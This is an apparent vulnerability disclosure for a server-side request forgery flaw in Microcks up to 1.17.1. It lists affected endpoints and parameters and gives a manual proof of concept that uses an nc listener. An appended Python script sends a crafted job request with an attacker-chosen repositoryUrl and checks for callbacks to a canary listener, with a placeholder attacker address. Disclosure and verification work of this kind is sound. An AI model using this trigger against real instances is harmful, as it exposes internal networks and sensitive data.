@b33t1e
Created November 15, 2023 04:43
[description]
Microcks up to and including 1.17.1 contains a Server-Side Request Forgery (SSRF) in the /jobs and /artifact/download components. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.
>
------------------------------------------
>
[Vulnerability Type]
Server-Side Request Forgery (SSRF)
>
------------------------------------------
>
[Vendor of Product]
https://github.com/microcks/microcks
>
------------------------------------------
>
[Affected Product Code Base]
Microcks <= 1.17.1
>
------------------------------------------
>
[Affected Component]
The API endpoints /jobs and /artifact/download are vulnerable to Server-Side Request Forgery (SSRF) through their repositoryUrl and url parameters, respectively: the server fetches whatever URL the caller supplies in them.
>
------------------------------------------
>
[Attack Type]
Remote
>
------------------------------------------
>
[Impact Escalation of Privileges]
true
>
------------------------------------------
>
[Impact Information Disclosure]
true
>
------------------------------------------
>
[Attack Vectors]
POC: 1. Use nc to listen on ip:port. 2. Create a job with "http://ip:port/ssrf_test" as the repositoryUrl parameter. 3. Once the job is created, nc receives the request made by the Microcks server.
Details: https://github.com/orgs/microcks/discussions/892
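The same out-of-band confirmation as a script, added here as an example (it is not the discoverer's PoC nor Microcks code). It replaces the manual nc listener with a small HTTP canary that records what calls back, tags the canary path with a random token so a hit cannot be mistaken for stray traffic, and builds the job-creation request that carries the attacker-chosen repositoryUrl. Two things are assumptions rather than facts from the write-up: the REST base path /api and a JSON job body with "name" and "repositoryUrl" fields. So that it runs offline, the demo at the bottom stands in for Microcks with a plain HTTP fetch of the canary URL; against a live instance the trigger is post_job and advertised_host is an address the target can reach.

```python
"""Out-of-band SSRF confirmation: canary listener plus the triggering request.

Added example, not the discoverer's or the Microcks project's code.
"""
import http.client
import json
import secrets
import threading
import time
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Callable, Dict, List, Optional


def build_job_request(microcks_base: str, repository_url: str) -> Dict[str, str]:
    """Describe the job-creation request carrying the attacker-chosen repositoryUrl.

    ASSUMPTION (not from the write-up): REST base path /api and a JSON body
    with "name" and "repositoryUrl" fields.
    """
    body = json.dumps({"name": "ssrf-probe", "repositoryUrl": repository_url})
    return {"url": microcks_base.rstrip("/") + "/api/jobs", "method": "POST",
            "content_type": "application/json", "body": body}


def post_job(microcks_base: str, repository_url: str) -> int:
    """Send the request from build_job_request to a live instance; returns the HTTP status."""
    spec = build_job_request(microcks_base, repository_url)
    req = urllib.request.Request(spec["url"], data=spec["body"].encode(),
                                 method=spec["method"],
                                 headers={"Content-Type": spec["content_type"]})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def ssrf_canary_check(trigger: Callable[[str], object], wait: float = 5.0,
                      listen_host: str = "127.0.0.1",
                      advertised_host: Optional[str] = None) -> List[Dict[str, str]]:
    """Start a canary listener, hand its URL to trigger(), report what called back.

    Returns the recorded requests; an empty list means no server-side fetch
    was observed within `wait` seconds. advertised_host is the address the
    target must use to reach the listener when it differs from listen_host.
    """
    hits: List[Dict[str, str]] = []
    token = secrets.token_hex(8)          # per-run marker in the canary path

    class Canary(BaseHTTPRequestHandler):
        def _record(self) -> None:
            hits.append({"method": self.command, "path": self.path,
                         "user_agent": self.headers.get("User-Agent", "")})
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"canary")

        do_GET = do_POST = _record

        def log_message(self, *args: object) -> None:   # keep stderr quiet
            pass

    server = HTTPServer((listen_host, 0), Canary)       # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    canary_url = f"http://{advertised_host or listen_host}:{server.server_port}/ssrf_test/{token}"
    try:
        trigger(canary_url)
        # The import may run after the API call returns, so allow a grace period.
        deadline = time.monotonic() + wait
        while not hits and time.monotonic() < deadline:
            time.sleep(0.05)
    finally:
        server.shutdown()
        server.server_close()
    return [h for h in hits if token in h["path"]]


def stand_in_fetch(url: str) -> None:
    """Constructed stand-in for the vulnerable behaviour (the server fetching
    repositoryUrl) so the demo runs offline. Not Microcks code."""
    parts = urllib.parse.urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port, timeout=5)
    conn.request("GET", parts.path or "/", headers={"User-Agent": "stand-in-importer"})
    conn.getresponse().read()
    conn.close()


if __name__ == "__main__":
    print("offline demo:", ssrf_canary_check(stand_in_fetch, wait=1.0))
    # Live instance (placeholder base URL and listener address, both assumptions):
    # print(ssrf_canary_check(lambda u: post_job("http://microcks.example:8080", u),
    #                         advertised_host="ATTACKER_REACHABLE_IP"))
```

A hit with the canary token in the path is the same evidence the nc step gives, plus the User-Agent of the component that performed the fetch, which is worth keeping in the report.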
>
------------------------------------------
>
[Discoverer]
beet1e
>
------------------------------------------
>
[Reference]
https://github.com/microcks/microcks
https://github.com/orgs/microcks/discussions/892